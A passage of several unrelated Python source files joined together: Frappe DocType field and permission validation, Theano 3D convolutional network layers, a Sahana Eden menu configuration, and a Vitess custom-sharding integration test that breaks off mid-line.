required for Link or Table type field {0} in row {1}").format(d.label, d.idx)) if d.options=="[Select]" or d.options==d.parent: return if d.options != d.parent: options = frappe.db.get_value("DocType", d.options, "name") if not options: frappe.throw(_("Options must be a valid DocType for field {0} in row {1}").format(d.label, d.idx)) else: # fix case d.options = options def check_hidden_and_mandatory(d): if d.hidden and d.reqd and not d.default: frappe.throw(_("Field {0} in row {1} cannot be hidden and mandatory without default").format(d.label, d.idx)) def check_width(d): if d.fieldtype == "Currency" and cint(d.width) < 100: frappe.throw(_("Max width for type Currency is 100px in row {0}").format(d.idx)) def check_in_list_view(d): if d.in_list_view and (d.fieldtype in not_allowed_in_list_view): frappe.throw(_("'In List View' not allowed for type {0} in row {1}").format(d.fieldtype, d.idx)) def check_in_global_search(d): if d.in_global_search and d.fieldtype in no_value_fields: frappe.throw(_("'In Global Search' not allowed for type {0} in row {1}") .format(d.fieldtype, d.idx)) def check_dynamic_link_options(d): if d.fieldtype=="Dynamic Link": doctype_pointer = list(filter(lambda df: df.fieldname==d.options, fields)) if not doctype_pointer or (doctype_pointer[0].fieldtype not in ("Link", "Select")) \ or (doctype_pointer[0].fieldtype=="Link" and doctype_pointer[0].options!="DocType"): frappe.throw(_("Options 'Dynamic Link' type of field must point to another Link Field with options as 'DocType'")) def check_illegal_default(d): if d.fieldtype == "Check" and d.default and d.default not in ('0', '1'): frappe.throw(_("Default for 'Check' type of field must be either '0' or '1'")) if d.fieldtype == "Select" and d.default and (d.default not in d.options.split("\n")): frappe.throw(_("Default for {0} must be an option").format(d.fieldname)) def check_precision(d): if d.fieldtype in ("Currency", "Float", "Percent") and d.precision is not None and not (1 <= cint(d.precision) <= 6): frappe.throw(_("Precision should be between 1 and 6")) def check_unique_and_text(d): if meta.issingle: d.unique = 0 d.search_index = 0 if getattr(d, "unique", False): if d.fieldtype not in ("Data", "Link", "Read Only"): frappe.throw(_("Fieldtype {0} for {1} cannot be unique").format(d.fieldtype, d.label)) if not d.get("__islocal"): try: has_non_unique_values = frappe.db.sql("""select `{fieldname}`, count(*) from `tab{doctype}` where ifnull({fieldname}, '') != '' group by `{fieldname}` having count(*) > 1 limit 1""".format( doctype=d.parent, fieldname=d.fieldname)) except pymysql.InternalError as e: if e.args and e.args[0] == ER.BAD_FIELD_ERROR: # ignore if missing column, else raise # this happens in case of Custom Field pass else: raise else: # else of try block if has_non_unique_values and has_non_unique_values[0][0]: frappe.throw(_("Field '{0}' cannot be set as Unique as it has non-unique values").format(d.label)) if d.search_index and d.fieldtype in ("Text", "Long Text", "Small Text", "Code", "Text Editor"): frappe.throw(_("Fieldtype {0} for {1} cannot be indexed").format(d.fieldtype, d.label)) def check_fold(fields): fold_exists = False for i, f in enumerate(fields): if f.fieldtype=="Fold": if fold_exists: frappe.throw(_("There can be only one Fold in a form")) fold_exists = True if i < len(fields)-1: nxt = fields[i+1] if nxt.fieldtype != "Section Break": frappe.throw(_("Fold must come before a Section Break")) else: frappe.throw(_("Fold can not be at the end of the form")) def check_search_fields(meta, fields): """Throw exception if `search_fields` don't contain valid fields.""" if not meta.search_fields: return # No value fields should not be included in search field search_fields = [field.strip() for field in (meta.search_fields or "").split(",")] fieldtype_mapper = { field.fieldname: field.fieldtype \ for field in filter(lambda field: field.fieldname in search_fields, fields) } for fieldname in search_fields: fieldname = fieldname.strip() if (fieldtype_mapper.get(fieldname) in no_value_fields) or \ (fieldname not in fieldname_list): frappe.throw(_("Search field {0} is not valid").format(fieldname)) def check_title_field(meta): """Throw exception if `title_field` isn't a valid fieldname.""" if not meta.get("title_field"): return if meta.title_field not in fieldname_list: frappe.throw(_("Title field must be a valid fieldname"), InvalidFieldNameError) def _validate_title_field_pattern(pattern): if not pattern: return for fieldname in re.findall("{(.*?)}", pattern, re.UNICODE): if fieldname.startswith("{"): # edge case when double curlies are used for escape continue if fieldname not in fieldname_list: frappe.throw(_("{{{0}}} is not a valid fieldname pattern. It should be {{field_name}}.").format(fieldname), InvalidFieldNameError) df = meta.get("fields", filters={"fieldname": meta.title_field})[0] if df: _validate_title_field_pattern(df.options) _validate_title_field_pattern(df.default) def check_image_field(meta): '''check image_field exists and is of type "Attach Image"''' if not meta.image_field: return df = meta.get("fields", {"fieldname": meta.image_field}) if not df: frappe.throw(_("Image field must be a valid fieldname"), InvalidFieldNameError) if df[0].fieldtype != 'Attach Image': frappe.throw(_("Image field must be of type Attach Image"), InvalidFieldNameError) def check_is_published_field(meta): if not meta.is_published_field: return if meta.is_published_field not in fieldname_list: frappe.throw(_("Is Published Field must be a valid fieldname"), InvalidFieldNameError) def check_timeline_field(meta): if not meta.timeline_field: return if meta.timeline_field not in fieldname_list: frappe.throw(_("Timeline field must be a valid fieldname"), InvalidFieldNameError) df = meta.get("fields", {"fieldname": meta.timeline_field})[0] if df.fieldtype not in ("Link", "Dynamic Link"): frappe.throw(_("Timeline field must be a Link or Dynamic Link"), InvalidFieldNameError) def check_sort_field(meta): '''Validate that sort_field(s) is a valid field''' if meta.sort_field: sort_fields = [meta.sort_field] if ',' in meta.sort_field: sort_fields = [d.split()[0] for d in meta.sort_field.split(',')] for fieldname in sort_fields: if not fieldname in fieldname_list + list(default_fields): frappe.throw(_("Sort field {0} must be a valid fieldname").format(fieldname), InvalidFieldNameError) def check_illegal_depends_on_conditions(docfield): ''' assignment operation should not be allowed in the depends on condition.''' depends_on_fields = ["depends_on", "collapsible_depends_on"] for field in depends_on_fields: depends_on = docfield.get(field, None) if depends_on and ("=" in depends_on) and \ re.match("""[\w\.:_]+\s*={1}\s*[\w\.@'"]+""", depends_on): frappe.throw(_("Invalid {0} condition").format(frappe.unscrub(field)), frappe.ValidationError) fields = meta.get("fields") fieldname_list = [d.fieldname for d in fields] not_allowed_in_list_view = list(copy.copy(no_value_fields)) not_allowed_in_list_view.append("Attach Image") if meta.istable: not_allowed_in_list_view.remove('Button') for d in fields: if not d.permlevel: d.permlevel = 0 if d.fieldtype != "Table": d.allow_bulk_edit = 0 if d.fieldtype == "Barcode": d.ignore_xss_filter = 1 if not d.fieldname: frappe.throw(_("Fieldname is required in row {0}").format(d.idx)) d.fieldname = d.fieldname.lower() check_illegal_characters(d.fieldname) check_unique_fieldname(d.fieldname) check_fieldname_length(d.fieldname) check_illegal_mandatory(d) check_link_table_options(d) check_dynamic_link_options(d) check_hidden_and_mandatory(d) check_in_list_view(d) check_in_global_search(d) check_illegal_default(d) check_unique_and_text(d) check_illegal_depends_on_conditions(d) check_fold(fields) check_search_fields(meta, fields) check_title_field(meta) check_timeline_field(meta) check_is_published_field(meta) check_sort_field(meta) check_image_field(meta) def validate_permissions_for_doctype(doctype, for_remove=False): """Validates if permissions are set correctly.""" doctype = frappe.get_doc("DocType", doctype) validate_permissions(doctype, for_remove) # save permissions for perm in doctype.get("permissions"): perm.db_update() clear_permissions_cache(doctype.name) def clear_permissions_cache(doctype): frappe.clear_cache(doctype=doctype) delete_notification_count_for(doctype) for user in frappe.db.sql_list("""select distinct `tabHas Role`.parent from `tabHas Role`, tabDocPerm where tabDocPerm.parent = %s and tabDocPerm.role = `tabHas Role`.role""", doctype): frappe.clear_cache(user=user) def validate_permissions(doctype, for_remove=False): permissions = doctype.get("permissions") if not permissions: frappe.msgprint(_('No Permissions Specified'), alert=True, indicator='orange') issingle = issubmittable = isimportable = False if doctype: issingle = cint(doctype.issingle) issubmittable = cint(doctype.is_submittable) isimportable = cint(doctype.allow_import) def get_txt(d): return _("For {0} at level {1} in {2} in row {3}").format(d.role, d.permlevel, d.parent, d.idx) def check_atleast_one_set(d): if not d.read and not d.write and not d.submit and not d.cancel and not d.create: frappe.throw(_("{0}: No basic permissions set").format(get_txt(d))) def check_double(d): has_similar = False similar_because_of = "" for p in permissions: if p.role==d.role and p.permlevel==d.permlevel and p!=d: if p.if_owner==d.if_owner: similar_because_of = _("If Owner") has_similar = True break if has_similar: frappe.throw(_("{0}: Only one rule allowed with the same Role, Level and {1}")\ .format(get_txt(d), similar_because_of)) def check_level_zero_is_set(d): if cint(d.permlevel) > 0 and d.role != 'All': has_zero_perm = False for p in permissions: if p.role==d.role and (p.permlevel or 0)==0 and p!=d: has_zero_perm = True break if not has_zero_perm: frappe.throw(_("{0}: Permission at level 0 must be set before higher levels are set").format(get_txt(d))) for invalid in ("create", "submit", "cancel", "amend"): if d.get(invalid): d.set(invalid, 0) def check_permission_dependency(d): if d.cancel and not d.submit: frappe.throw(_("{0}: Cannot set Cancel without Submit").format(get_txt(d))) if (d.submit or d.cancel or d.amend) and not d.write: frappe.throw(_("{0}: Cannot set Submit, Cancel, Amend without Write").format(get_txt(d))) if d.amend and not d.write: frappe.throw(_("{0}: Cannot set Amend without Cancel").format(get_txt(d))) if d.get("import") and not d.create: frappe.throw(_("{0}: Cannot set Import without Create").format(get_txt(d))) def remove_rights_for_single(d): if not issingle: return if d.report: frappe.msgprint(_("Report cannot be set for Single types")) d.report = 0 d.set("import", 0) d.set("export", 0) for ptype, label in [["set_user_permissions", _("Set User Permissions")]]: if d.get(ptype): d.set(ptype, 0) frappe.msgprint(_("{0} cannot be set for Single types").format(label)) def check_if_submittable(d): if d.submit and not issubmittable: frappe.throw(_("{0}: Cannot set Assign Submit if not Submittable").format(get_txt(d))) elif d.amend and not issubmittable: frappe.throw(_("{0}: Cannot set Assign Amend if not Submittable").format(get_txt(d))) def check_if_importable(d): if d.get("import") and not isimportable: frappe.throw(_("{0}: Cannot set import as {1} is not importable").format(get_txt(d), doctype)) for d in permissions: if not d.permlevel: d.permlevel=0 check_atleast_one_set(d) if not for_remove: check_double(d) check_permission_dependency(d) check_if_submittable(d) check_if_importable(d) check_level_zero_is_set(d) remove_rights_for_single(d) def make_module_and_roles(doc, perm_fieldname="permissions"): """Make `Module Def` and `Role` records if already not made. Called while installing.""" try: if hasattr(doc,'restrict_to_domain') and doc.restrict_to_domain and \ not frappe.db.exists('Domain', doc.restrict_to_domain): frappe.get_doc(dict(doctype='Domain', domain=doc.restrict_to_domain)).insert() if not frappe.db.exists("Module Def", doc.module): m = frappe.get_doc({"doctype": "Module Def", "module_name": doc.module}) m.app_name = frappe.local.module_app[frappe.scrub(doc.module)] m.flags.ignore_mandatory = m.flags.ignore_permissions = True m.insert() default_roles = ["Administrator", "Guest", "All"] roles = [p.role for p in doc.get("permissions") or []] + default_roles for role in list(set(roles)): if not frappe.db.exists("Role", role): r = frappe.get_doc(dict(doctype= "Role", role_name=role, desk_access=1)) r.flags.ignore_mandatory = r.flags.ignore_permissions = True r.insert() except frappe.DoesNotExistError as e: pass except frappe.SQLError as e: if e.args[0]==1146: pass else: raise def init_list(doctype): """Make boilerplate list views.""" doc = frappe.get_meta(doctype) make_boilerplate("controller_list.js", doc) make_boilerplate("controller_list.html", doc) def check_if_fieldname_conflicts_with_methods(doctype, fieldname): doc = frappe.get_doc({"doctype": doctype}) method_list = [method for method in dir(doc) if isinstance(method, str) and callable(getattr(doc, method))] if fieldname in method_list: frappe.throw(_("Fieldname {0} conflicting with meta object").format(fieldname)) def clear_linked_doctype_cache(): frappe.cache().delete_value('linked_doctypes_without_ignore_user_permissions_enabled')
""" 3D ConvNet layers using Theano, Pylearn and Numpy ConvLayer: convolutions, filter bank NormLayer: normalization (LCN, GCN, local mean subtraction) PoolLayer: pooling, subsampling RectLayer: rectification (absolute value) """ from conv3d2d import conv3d from maxpool3d import max_pool_3d from activations import relu, softplus from numpy import sqrt, prod, ones, floor, repeat, pi, exp, zeros, sum from numpy.random import RandomState from theano.tensor.nnet import conv2d from theano import shared, config, _asarray import theano.tensor as T floatX = config.floatX class ConvLayer(object): """ Convolutional layer, Filter Bank Layer """ def __init__(self, input, n_in_maps, n_out_maps, kernel_shape, video_shape, batch_size, activation, layer_name="Conv", rng=RandomState(1234), borrow=True, W=None, b=None): """ video_shape: (frames, height, width) kernel_shape: (frames, height, width) W_shape: (out, in, kern_frames, kern_height, kern_width) """ self.__dict__.update(locals()) del self.self # init W if W != None: W_val = W else: # fan in: filter time x filter height x filter width x input maps fan_in = prod(kernel_shape)*n_in_maps norm_scale = 2. * sqrt( 1. / fan_in ) if activation in (relu,softplus): norm_scale = 0.01 W_shape = (n_out_maps, n_in_maps)+kernel_shape W_val = _asarray(rng.normal(loc=0, scale=norm_scale, size=W_shape),\ dtype=floatX) self.W = shared(value=W_val, borrow=borrow, name=layer_name+'_W') self.params = [self.W] # init bias if b != None: b_val = b elif activation in (relu,softplus): b_val = ones((n_out_maps,), dtype=floatX) else: b_val = zeros((n_out_maps,), dtype=floatX) self.b = shared(b_val, name=layer_name+"_b", borrow=borrow) self.params.append(self.b) # 3D convolution; dimshuffle: last 3 dimensions must be (in, h, w) n_fr, h, w = video_shape n_fr_k, h_k, w_k = kernel_shape out = conv3d( signals=input.dimshuffle([0,2,1,3,4]), filters=self.W, signals_shape=(batch_size, n_fr, n_in_maps, h, w), filters_shape=(n_out_maps, n_fr_k, n_in_maps, h_k, w_k), border_mode='valid').dimshuffle([0,2,1,3,4]) out += self.b.dimshuffle('x',0,'x','x','x') self.output = activation(out) class NormLayer(object): """ Normalization layer """ def __init__(self, input, method="lcn", **kwargs): """ method: "lcn", "gcn", "mean" LCN: local contrast normalization kwargs: kernel_size=9, threshold=1e-4, use_divisor=True GCN: global contrast normalization kwargs: scale=1., subtract_mean=True, use_std=False, sqrt_bias=0., min_divisor=1e-8 MEAN: local mean subtraction kwargs: kernel_size=5 """ input_shape = input.shape # make 4D tensor out of 5D tensor -> (n_images, 1, height, width) input_shape_4D = (input_shape[0]*input_shape[1]*input_shape[2], 1, input_shape[3], input_shape[4]) input_4D = input.reshape(input_shape_4D, ndim=4) if method=="lcn": out = self.lecun_lcn(input_4D, **kwargs) elif method=="gcn": out = self.global_contrast_normalize(input_4D,**kwargs) elif method=="mean": out = self.local_mean_subtraction(input_4D, **kwargs) else: raise NotImplementedError() self.output = out.reshape(input_shape) def lecun_lcn(self, X, kernel_size=7, threshold = 1e-4, use_divisor=False): """ Yann LeCun's local contrast normalization Orginal code in Theano by: Guillaume Desjardins """ filter_shape = (1, 1, kernel_size, kernel_size) filters = gaussian_filter(kernel_size).reshape(filter_shape) filters = shared(_asarray(filters, dtype=floatX), borrow=True) convout = conv2d(X, filters=filters, filter_shape=filter_shape, border_mode='full') # For each pixel, remove mean of kernel_sizexkernel_size neighborhood mid = int(floor(kernel_size/2.)) new_X = X - convout[:,:,mid:-mid,mid:-mid] if use_divisor: # Scale down norm of kernel_sizexkernel_size patch sum_sqr_XX = conv2d(T.sqr(T.abs_(new_X)), filters=filters, filter_shape=filter_shape, border_mode='full') denom = T.sqrt(sum_sqr_XX[:,:,mid:-mid,mid:-mid]) per_img_mean = denom.mean(axis=[2,3]) divisor = T.largest(per_img_mean.dimshuffle(0,1,'x','x'), denom) divisor = T.maximum(divisor, threshold) new_X /= divisor return new_X#T.cast(new_X, floatX) def local_mean_subtraction(self, X, kernel_size=5): filter_shape = (1, 1, kernel_size, kernel_size) filters = mean_filter(kernel_size).reshape(filter_shape) filters = shared(_asarray(filters, dtype=floatX), borrow=True) mean = conv2d(X, filters=filters, filter_shape=filter_shape, border_mode='full') mid = int(floor(kernel_size/2.)) return X - mean[:,:,mid:-mid,mid:-mid] def global_contrast_normalize(self, X, scale=1., subtract_mean=True, use_std=False, sqrt_bias=0., min_divisor=1e-8): ndim = X.ndim if not ndim in [3,4]: raise NotImplementedError("X.dim>4 or X.ndim<3") scale = float(scale) mean = X.mean(axis=ndim-1) new_X = X.copy() if subtract_mean: if ndim==3: new_X = X - mean[:,:,None] else: new_X = X - mean[:,:,:,None] if use_std: normalizers = T.sqrt(sqrt_bias + X.var(axis=ndim-1)) / scale else: normalizers = T.sqrt(sqrt_bias + (new_X ** 2).sum(axis=ndim-1)) / scale # Don't normalize by anything too small. T.set_subtensor(normalizers[(normalizers < min_divisor).nonzero()], 1.) if ndim==3: new_X /= normalizers[:,:,None] else: new_X /= normalizers[:,:,:,None] return new_X class PoolLayer(object): """ Subsampling and pooling layer """ def __init__(self, input, pool_shape, method="max"): """ method: "max", "avg", "L2", "L4", ... """ self.__dict__.update(locals()) del self.self if method=="max": out = max_pool_3d(input,pool_shape) else: raise NotImplementedError() self.output = out class RectLayer(object): """ Rectification layer """ def __init__(self, input): self.output = T.abs_(input) def gaussian_filter(kernel_shape): x = zeros((kernel_shape, kernel_shape), dtype='float32') def gauss(x, y, sigma=2.0): Z = 2 * pi * sigma**2 return 1./Z * exp(-(x**2 + y**2) / (2. * sigma**2)) mid = floor(kernel_shape/ 2.) for i in xrange(0,kernel_shape): for j in xrange(0,kernel_shape): x[i,j] = gauss(i-mid, j-mid) return x / sum(x) def mean_filter(kernel_size): s = kernel_size**2 x = repeat(1./s, s).reshape((kernel_size, kernel_size)) return x
# -*- coding: utf-8 -*- from gluon import current from s3 import * from s3layouts import * try: from .layouts import * except ImportError: pass import s3menus as default RC = {"organisation_type.name" : "Red Cross / Red Crescent"} # ============================================================================= class S3MainMenu(default.S3MainMenu): """ Custom Application Main Menu """ # ------------------------------------------------------------------------- @classmethod def menu(cls): """ Main Menus """ # Footer current.menu.about = cls.menu_about() if current.auth.is_logged_in(): # Provide top-level Navigation bar return MM() else: # Blank top menu return "" # ------------------------------------------------------------------------- @classmethod def menu_about(cls): menu_about = MA(c="default")( MA("About Us", f="about"), MA("Contact", f="contact"), MA("Help", f="help"), MA("Privacy", f="privacy"), ) return menu_about # ============================================================================= class S3OptionsMenu(default.S3OptionsMenu): """ Custom Controller Menus """ # ------------------------------------------------------------------------- def admin(self): """ ADMIN menu """ if current.auth.s3_has_role("ADMIN"): # Standard Admin Menu menu = super(S3OptionsMenu, self).admin() # Additional Items menu(M("Forums", c="pr", f="forum"), M("Request Approvers", c="inv", f="req_approver"), M("Map Settings", c="gis", f="config"), M("Content Management", c="cms", f="index"), ) return menu else: # OrgAdmin return self.pr() # ------------------------------------------------------------------------- def gis(self): """ GIS / GIS Controllers """ if current.request.function == "index": # Empty so as to leave maximum space for the Map # - functionality accessible via the Admin menu instead return None else: return super(S3OptionsMenu, self).gis() # ------------------------------------------------------------------------- def pr(self): """ Person Registry """ auth = current.auth has_role = auth.s3_has_role if has_role("ADMIN"): if current.request.function == "forum": return self.admin() return M(c="pr")( M("Persons", f="person")( M("Create", m="create"), ), #M("Groups", f="group")( # M("Create", m="create"), #), #M("Forums", f="forum")( # M("Create", m="create"), #), ) elif has_role("ORG_ADMIN"): return M()(M("Users", c="admin", f="user")( ), M("Forums", c="pr", f="forum")( M("Create", m="create"), ), M("Request Approvers", c="inv", f="req_approver")( ), ) else: # Managers (HR or Training Center Coordinators) return M()(M("Forums", c="pr", f="forum")( M("Create", m="create"), ), ) # ------------------------------------------------------------------------- @staticmethod def hrm(): """ HRM Human Talent """ request = current.request if "profile" in request.get_vars: # No Side Menu return None auth = current.auth has_role = auth.s3_has_role s3 = current.session.s3 len_roles = len(s3.roles) if (len_roles <= 2) or \ (len_roles == 3 and has_role("RIT_MEMBER") and not has_role("ADMIN")): # No Side Menu return None #ADMIN = s3.system_roles.ADMIN ORG_ADMIN = s3.system_roles.ORG_ADMIN # training_functions imported from layouts if request.function in training_functions: return M()( M("Training Centers", c="hrm", f="training_center")( ), M("Training Course Catalog", c="hrm", f="course")( M("Create", m="create"), M("Import", m="import", p="create", restrict=(ORG_ADMIN, "ns_training_manager", "training_coordinator", )), #M("Certificates", f="certificate"), # Just access this via Tabs of Courses & Certificates #M("Course Certificates", f="course_certificate"), ), M("Training Events", c="hrm", f="training_event")( M("Create", m="create"), M("Search Training Participants", f="training"), M("Import Participant List", f="training", m="import", restrict=(ORG_ADMIN, "ns_training_manager", "training_coordinator", "training_assistant", )), ), M("External Trainees", c="hrm", f="trainee")( M("Create", m="create"), ), M("Report", c="hrm", f="training", m="report")( ), ) else: return M()( M("Human Talent", c="hrm", f="human_resource", m="summary")( M("Create", m="create"), M("Import", f="person", m="import", restrict=(ORG_ADMIN, "hr_manager", )), ), M("Report", c="hrm", f="human_resource", m="report")( #M("Staff Report", m="report"), #M("Expiring Staff Contracts Report", # vars={"expiring": "1"}), #M("Hours by Role Report", f="programme_hours", m="report", # vars=Storage(rows="job_title_id", # cols="month", # fact="sum(hours)"), # ), M("Hours by Program Report", f="programme_hours", m="report", vars=Storage(rows="programme_id", cols="month", fact="sum(hours)"), ), ), #M("Teams", c="hrm", f="group")( # M("Create", m="create"), # M("Search Members", f="group_membership"), # M("Import", f="group_membership", m="import"), #), M("National Societies", c="org", f="organisation", vars=RC)( M("Create", m="create", vars=RC ), M("Import", m="import", p="create", restrict=[ORG_ADMIN]) ), #M("Offices", c="org", f="office")( # M("Create", m="create"), # M("Import", m="import", p="create"), #), #M("Department Catalog", c="hrm", f="department")( # M("Create", m="create"), #), M("Position Catalog", c="hrm", f="job_title")( M("Create", m="create"), M("Import", m="import", p="create", restrict=(ORG_ADMIN, "hr_manager", )), ), M("Programs", c="hrm", f="programme")( M("Create", m="create"), M("Import Hours", f="programme_hours", m="import"), ), #M("Organization Types", c="org", f="organisation_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Office Types", c="org", f="office_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Facility Types", c="org", f="facility_type", # restrict=[ADMIN])( # M("Create", m="create"), #), #M("Personal Profile", c="hrm", f="person", # vars={"access": "personal"}) ) # ------------------------------------------------------------------------- @staticmethod def member(): """ Membership Management """ return M(c="member")( M("Partners", f="membership", m="summary")( M("Create", m="create"), #M("Report", m="report"), M("Import", f="person", m="import"), ), M("Partner Types", f="membership_type")( M("Create", m="create"), #M("Import", m="import"), ), ) # ------------------------------------------------------------------------- def org(self): """ Organisation Management """ # Same as HRM return self.hrm() # ------------------------------------------------------------------------- @staticmethod def inv(): """ INV / Inventory """ if current.request.function == "req_approver": # Accessed via Settings has_role = current.auth.s3_has_role if has_role("ADMIN"): return self.admin() elif has_role("ORG_ADMIN"): return self.pr() else: return None if current.auth.s3_has_roles(("ORG_ADMIN", "wh_operator", "logs_manager", )): return M(c="inv")( M("Stock Management",link=False)( M("Stock Adjustments", f="adj"), M("Kitting", f="kitting"), #M("Receive a new shipment", f="recv", m="create"), M("Receive a new shipment", f="recv", vars = {"incoming": 1}), M("Send a new shipment", f="send", m="create"), ), M("Purchases", f="order_item", restrict=["ORG_ADMIN", "logs_manager"]), M("Requests", f="req")( #M("My Requests", # vars = {"mine": 1}, # ), ), M("Import Inventory", f="inv_item", m="import", restrict=["ADMIN"]), M("Parameters", link=False, restrict=["ORG_ADMIN", "logs_manager"])( M("Warehouses", f="warehouse"), M("Projects", f="project"), M("Catalogs", c="supply", f="catalog"), M("Item Categories", c="supply", f="item_category"), M("Items", c="supply", f="item"), M("Donors", f="donor"), M("Suppliers", f="supplier"), M("Facilities", f="facility"), M("Packages", f="package"), M("Stock limit", f="minimum"), ), M("Reports", link=False)( M("Inventory", f="inv_item", m="summary"), M("Stock Movements", f="inv_item", m="grouped", vars = {"report": "movements"}, ), M("Stock Organisation", f="inv_item", m="grouped", vars = {"report": "default"}, ), ), ) else: # Normal users see their own Requests & Inventory Reports return M(c="inv")( M("My Requests", f="req", vars = {"mine": 1})( ), M("Reports", link=False)( M("Inventory", f="inv_item", m="summary"), ), ) # ------------------------------------------------------------------------- #def proc(self): # """ Procurements """ # Same as Inventory # return self.inv() # ------------------------------------------------------------------------- @staticmethod def project(): """ PROJECT / Project Tracking & Management """ #root_org = current.auth.root_org_name() #def community_volunteers(i): # if root_org == "Honduran Red Cross": # return True # else: # return False system_roles = current.session.s3.system_roles ORG_ADMIN = system_roles.ORG_ADMIN menu = M(c="project")( M("Programs", f="programme")( M("Create", m="create"), ), M("Projects", f="project", m="summary")( M("Create", m="create"), ), M("Locations", f="location")( # Better created from tab (otherwise Activity Type filter won't work) #M("Create", m="create"), M("Map", m="map"), M("Community Contacts", f="location_contact"), #M("Community Volunteers", f="volunteer", # check=community_volunteers), ), M("Reports", f="location", m="report")( M("3W", f="location", m="report"), M("Beneficiaries", f="beneficiary", m="report"), #M("Indicators", f="indicator", m="report", # check=indicators, # ), #M("Indicators over Time", f="indicator", m="timeplot", # check=indicators, # ), M("Funding", f="organisation", m="report"), M("Global Report of Projects Status", f="project", m="grouped"), ), M("Import", f="project", m="import", p="create", restrict=[ORG_ADMIN])( M("Import Projects", m="import", p="create"), M("Import Project Organizations", f="organisation", m="import", p="create"), M("Import Project Communities", f="location", m="import", p="create"), ), M("National Societies", c="org", f="organisation", vars=RC)( #M("Create", m="create", restrict=[ADMIN]), #M("Import", m="import", p="create", restrict=[ADMIN]), ), M("Partner Organizations", f="partners")( M("Create", m="create", restrict=[ORG_ADMIN]), M("Import", m="import", p="create", restrict=[ORG_ADMIN]), ), #M("Activity Types", f="activity_type")( # M("Create", m="create"), #), M("Beneficiary Types", f="beneficiary_type")( M("Create", m="create"), ), #M("Demographics", f="demographic")( # M("Create", m="create"), #), M("Hazards", f="hazard")( M("Create", m="create"), ), #M("Indicators", f="indicator", # check=indicators)( # M("Create", m="create"), #), M("Sectors", f="sector")( M("Create", m="create"), ), M("Themes", f="theme")( M("Create", m="create"), ), M("Period of Time", f="window")() ) return menu # ------------------------------------------------------------------------- @staticmethod def deploy(): """ RIT Alerting and Deployments """ return M()(M("Missions", c="deploy", f="mission", m="summary")( M("Create", m="create"), M("Active Missions", m="summary", vars={"~.status__belongs": "2"}), ), M("Alerts", c="deploy", f="alert")( M("Create", m="create"), #M("InBox", # c="deploy", f="email_inbox", #), M("Twitter Settings", #c="deploy", f="email_channel", #p="update", t="msg_email_channel", c="deploy", f="twitter_channel", p="update", t="msg_twitter_channel", ), ), M("Deployments", c="deploy", f="assignment", m="summary" ), #M("Sectors", # c="deploy", f="job_title", restrict=["ADMIN"], #), M("Disaster Types", c="event", f="event_type", restrict=["ADMIN"], ), M("RIT Members", c="deploy", f="human_resource", m="summary")( M("Add Member", c="deploy", f="application", m="select", p="create", t="deploy_application", ), M("Import Members", c="deploy", f="person", m="import"), ), M("Online Manual", c="deploy", f="index"), ) # END =========================================================================
#!/usr/bin/env python # # Copyright 2015, Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. import base64 import unittest from vtproto import topodata_pb2 from vtdb import vtgate_client import environment import tablet import utils # shards shard_0_master = tablet.Tablet() shard_0_rdonly = tablet.Tablet() shard_1_master = tablet.Tablet() shard_1_rdonly = tablet.Tablet() def setUpModule(): try: environment.topo_server().setup() setup_procs = [ shard_0_master.init_mysql(), shard_0_rdonly.init_mysql(), shard_1_master.init_mysql(), shard_1_rdonly.init_mysql(), ] utils.Vtctld().start() utils.VtGate().start() utils.wait_procs(setup_procs) except: tearDownModule() raise def tearDownModule(): if utils.options.skip_teardown: return teardown_procs = [ shard_0_master.teardown_mysql(), shard_0_rdonly.teardown_mysql(), shard_1_master.teardown_mysql(), shard_1_rdonly.teardown_mysql(), ] utils.wait_procs(teardown_procs, raise_on_error=False) environment.topo_server().teardown() utils.kill_sub_processes() utils.remove_tmp_files() shard_0_master.remove_tree() shard_0_rdonly.remove_tree() shard_1_master.remove_tree() shard_1_rdonly.remove_tree() class TestCustomSharding(unittest.TestCase): """Test a custom-shared keyspace.""" def _vtdb_conn(self): protocol, addr = utils.vtgate.rpc_endpoint(python=True) return vtgate_client.connect(protocol, addr, 30.0) def _insert_data(self, shard, start, count, table='data'): sql = 'insert into ' + table + '(id, name) values (%(id)s, %(name)s)' conn = self._vtdb_conn() cursor = conn.cursor( tablet_type='master', keyspace='test_keyspace', shards=[shard], writable=True) for x in xrange(count): bindvars = { 'id': start+x, 'name': 'row %d' % (start+x), } conn.begin() cursor.execute(sql, bindvars) conn.commit() conn.close() def _check_data(self, shard, start, count, table='data'): sql = 'select name from ' + table + ' where id=%(id)s' conn = self._vtdb_conn() cursor = conn.cursor( tablet_type='master', keyspace='test_keyspace', shards=[shard]) for x in xrange(count): bindvars = { 'id': start+x, } cursor.execute(sql, bindvars) qr = cursor.fetchall() self.assertEqual(len(qr), 1) v = qr[0][0] self.assertEqual(v, 'row %d' % (start+x)) conn.close() def test_custom_end_to_end(self): """Runs through the common operations of a custom sharded keyspace. Tests creation with one shard, schema change, reading / writing data, adding one more shard, reading / writing data from both shards, applying schema changes again, and reading / writing data from both shards again. """ utils.run_vtctl(['CreateKeyspace', 'test_keyspace']) # start the first shard only for now shard_0_master.init_tablet('master', 'test_keyspace', '0') shard_0_rdonly.init_tablet('rdonly', 'test_keyspace', '0') for t in [shard_0_master, shard_0_rdonly]: t.create_db('vt_test_keyspace') t.start_vttablet(wait_for_state=None) for t in [shard_0_master, shard_0_rdonly]: t.wait_for_vttablet_state('SERVING') utils.run_vtctl(['InitShardMaster', 'test_keyspace/0', shard_0_master.tablet_alias], auto_log=True) utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True) self._check_shards_count_in_srv_keyspace(1) s = utils.run_vtctl_json(['GetShard', 'test_keyspace/0']) self.assertEqual(len(s['served_types']), 3) # create a table on shard 0 sql = '''create table data( id bigint auto_increment, name varchar(64), primary key (id) ) Engine=InnoDB''' utils.run_vtctl(['ApplySchema', '-sql=' + sql, 'test_keyspace'], auto_log=True) # reload schema everywhere so the QueryService knows about the tables for t in [shard_0_master, shard_0_rdonly]: utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True) # insert data on shard 0 self._insert_data('0', 100, 10) # re-read shard 0 data self._check_data('0', 100, 10) # create shard 1 shard_1_master.init_tablet('master', 'test_keyspace', '1') shard_1_rdonly.init_tablet('rdonly', 'test_keyspace', '1') for t in [shard_1_master, shard_1_rdonly]: t.start_vttablet(wait_for_state=None) for t in [shard_1_master, shard_1_rdonly]: t.wait_for_vttablet_state('NOT_SERVING') s = 